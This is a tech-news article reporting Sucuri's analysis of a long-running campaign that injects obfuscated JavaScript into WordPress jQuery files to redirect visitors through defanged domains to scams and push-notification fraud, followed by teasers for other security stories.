Anatomy of a campaign to inject JavaScript into compromised WordPress sites

Reverse-engineered code redirects visitors to dodgy corners of the internet


A years-long campaign by miscreants to insert malicious JavaScript into vulnerable WordPress sites, so that visitors are redirected to scam websites, has been documented by reverse-engineers.

An investigation by analysts at Sucuri into malware found on WordPress installations revealed a much larger and ongoing campaign that last month, we're told, hijacked more than 6,600 websites. The team has seen a spike in complaints this month related to the intrusions, according to analyst Krasimir Konov.

"The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files," Konov wrote.

Those included such files as ./wp-includes/js/jquery/jquery.min.js and ./wp-includes/js/jquery/jquery-mgrate.min.js. Essentially, miscreants are compromising websites, and then try to automatically inject their own malicious code into any .js files with jQuery in the filename.

They also used CharCode to obfuscate the malicious JavaScript and evade detection. The obfuscated software is active on every page that pulls in the vandalized jQuery library files, enabling the attacker to redirect the site's visitors to whatever destination they choose. And that's usually phishing pages, malware-laced downloads, ad banners, or even more redirects, we're told.

To do this, the malicious injection creates a new script element on the page with a domain of legendarytable[.]com as the source. The code from that domain calls out to second external domain – local[.]drakefollow[.]com – which calls out to another one, setting up a series of domains the visitor is sent through until they're redirected to a site of one of many different domains.

"At this point, it's a free for all," Konov wrote. "Domains at the end of the redirect chain may be used to load advertisements, phishing pages, malware, or even more redirects."

Before landing on the final destination page, some visitors are sent to a fake CAPTCHA page, which tries to trick them into subscribing to push notifications from the malicious site.

"If they click on the fake CAPTCHA, they'll be opted in to receive unwanted ads even when the site isn't open — and ads will look like they come from the operating system, not from a browser," he wrote.

"These sneaky push notification opt-in maneuvers also happen to be one of the most common ways attackers display 'tech support' scams, which inform users that their computer is infected or slow and they should call a toll-free number to fix the problem."

WordPress powers about 43 percent of the websites on the internet, according to W3Techs, but that reach also makes it a popular target for bad actors. About 90 percent of the requests they get for cleaning up a website were related to WordPress, with malicious redirects being the result of some of the most common malware infections, Sucuri said.

"As new vulnerabilities in WordPress plugins are discovered, we anticipate that they will be caught up in the massive ongoing redirect campaign sending unsuspecting victims to fraudulent websites and tech support scams," they wrote. ®


Other stories you might like

  • Cisco warns of security holes in its security appliances
    Bugs potentially useful for rogue insiders, admin account hijackers

    Cisco has alerted customers to another four vulnerabilities in its products, including a high-severity flaw in its email and web security appliances. 

    The networking giant has issued a patch for that bug, tracked as CVE-2022-20664. The flaw is present in the web management interface of Cisco's Secure Email and Web Manager and Email Security Appliance in both the virtual and hardware appliances. Some earlier versions of both products, we note, have reached end of life, and so the manufacturer won't release fixes; it instead told customers to migrate to a newer version and dump the old.

    This bug received a 7.7 out of 10 CVSS severity score, and Cisco noted that its security team is not aware of any in-the-wild exploitation, so far. That said, given the speed of reverse engineering, that day is likely to come. 

    Continue reading
  • Carnival Cruises torpedoed by US states, agrees to pay $6m after wave of cyberattacks
    Now those are some phishing boats

    Carnival Cruise Lines will cough up more than $6 million to end two separate lawsuits filed by 46 states in the US after sensitive, personal information on customers and employees was accessed in a string of cyberattacks.

    A couple of years ago, as the coronavirus pandemic was taking hold, the Miami-based biz revealed intruders had not only encrypted some of its data but also downloaded a collection of names and addresses; Social Security info, driver's license, and passport numbers; and health and payment information of thousands of people in almost every American state.

    It all started to go wrong more than a year prior, as the cruise line became aware of suspicious activity in May 2019. This apparently wasn't disclosed until 10 months later, in March 2020.

    Continue reading
  • Now Windows Follina zero-day exploited to infect PCs with Qbot
    Data-stealing malware also paired with Black Basta ransomware gang

    Miscreants are reportedly exploiting the recently disclosed critical Windows Follina zero-day flaw to infect PCs with Qbot, thus aggressively expanding their reach.

    The bot's operators are also working with the Black Basta gang to spread ransomware in yet another partnership in the underground world of cyber-crime, it is claimed.

    This combination of Follina exploitation and its use to extort organizations makes the malware an even larger threat for enterprises. Qbot started off as a software nasty that raided people's online bank accounts, and evolved to snoop on user keystrokes and steal sensitive information from machines. It can also deliver other malware payloads, such as backdoors and ransomware, onto infected Windows systems, and forms a remote-controllable botnet.

    Continue reading
  • Europol arrests nine suspected of stealing 'several million' euros via phishing
    Victims lured into handing over online banking logins, police say

    Europol cops have arrested nine suspected members of a cybercrime ring involved in phishing, internet scams, and money laundering.

    The alleged crooks are believed to have stolen "several million euros" from at least "dozens of Belgian victims," according to that nation's police, which, along with the Dutch, supported the cross-border operation.

    On Tuesday, after searching 24 houses in the Netherlands, officers cuffed eight men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and Spijkenisse, and a 25-year-old woman from Deventer. We're told the cops seized, among other things, a firearm, designer clothing, expensive watches, and tens of thousands of euros.

    Continue reading
  • Emotet malware gang re-emerges with Chrome-based credit card heistware
    Crimeware groups are re-inventing themselves

    The criminals behind the Emotet botnet – which rose to fame as a banking trojan before evolving into spamming and malware delivery – are now using it to target credit card information stored in the Chrome web browser.

    Once the data – including the user's name, the card's numbers and expiration information – is exfiltrated, the malware will send it to command-and-control (C2) servers that are different than the one that the card stealer module uses, according to researchers with cybersecurity vendor Proofpoint's Threat Insight team.

    The new card information module is the latest illustration of Emotet's Lazarus-like return. It's been more than a year since Europol and law enforcement from countries including the United States, the UK and Ukraine tore down the Emotet actors' infrastructure in January 2021 and – they hoped – put the malware threat to rest.

    Continue reading
  • Halfords suffers a puncture in the customer details department
    I like driving in my car, hope my data's not gone far

    UK automobile service and parts seller Halfords has shared the details of its customers a little too freely, according to the findings of a security researcher.

    Like many, cyber security consultant Chris Hatton used Halfords to keep his car in tip-top condition, from tires through to the annual safety checks required for many UK cars.

    In January, Hatton replaced a tire on his car using a service from Halfords. It's a simple enough process – pick a tire online, select a date, then wait. A helpful confirmation email arrived with a link for order tracking. A curious soul, Hatton looked at what was happening behind the scenes when clicking the link and "noticed some API calls that seemed ripe for an IDOR" [Insecure Direct Object Reference].

    Continue reading
  • TypeScript joins 5 most used languages in 2022 lineup
    Stackoverflow survey: JavaScript still in lead. Plus, you may hate COBOL, but users saw a salary jump

    The annual Stackoverflow survey is here and while JavaScript continues to rule the roost, TypeScript has edged past Java to make it into the top five most commonly used programming languages.

    Microsoft's superset of JavaScript has been slowly creeping up the rankings: it was seventh most used in 2021, up from ninth place in 2020, and languished in 12th in 2018. In the latest study it was fifth.

    Interestingly, despite TypeScript's popularity in the usage stakes, affection for the technology dropped. Rust continued its run as the most loved language (87 percent of developers wanted to continue using it) but TypeScript slipped from third to fourth in the fondness stakes as Elixir leapt into second place from fourth in 2021.

    Continue reading

Biting the hand that feeds IT © 1998–2022